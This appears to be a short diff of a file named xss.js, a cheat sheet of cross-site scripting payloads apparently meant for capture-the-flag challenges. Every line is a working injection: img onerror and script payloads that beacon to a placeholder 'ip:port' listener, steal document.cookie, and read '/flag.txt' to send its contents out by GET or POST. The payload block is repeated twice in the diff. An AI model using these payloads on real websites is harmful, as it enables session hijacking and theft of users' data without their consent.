Reelix · June 16, 2025 11:24
diff --git a/xss.js b/xss.js
 // Test For Image
 <img src='http://ip:port/xss' />

 // Test For Fetch
 <img src=x onerror=fetch('http://ip:port/xss2') />

 // Fetch Cookie Stealing
 <img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) />

 // Fetch entire page contents
 // Note: "'s are required (Chained promises)
 <img src=x onerror="fetch('/flag.txt').then(r=>r.text()).then(d=>fetch('http://ip:port/data?d='+btoa(d)))">
  
 // More data (When you're fetching more than 2048 chars
 // Make sure you can catch POST data
 <script>fetch('/flag.txt').then(r=>r.text()).then(d=>{fetch('http://ip:port/data',{method:'POST',body:'d='+encodeURIComponent(btoa(d))})})</script>
	// Test For Image
	<img src='http://ip:port/xss' />

	// Test For Fetch
	<img src=x onerror=fetch('http://ip:port/xss2') />

	// Fetch Cookie Stealing
	<img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) />

	// Fetch entire page contents
	// Note: "'s are required (Chained promises)
	<img src=x onerror="fetch('/flag.txt').then(r=>r.text()).then(d=>fetch('http://ip:port/data?d='+btoa(d)))">

	// More data (When you're fetching more than 2048 chars
	// Make sure you can catch POST data
	<script>fetch('/flag.txt').then(r=>r.text()).then(d=>{fetch('http://ip:port/data',{method:'POST',body:'d='+encodeURIComponent(btoa(d))})})</script>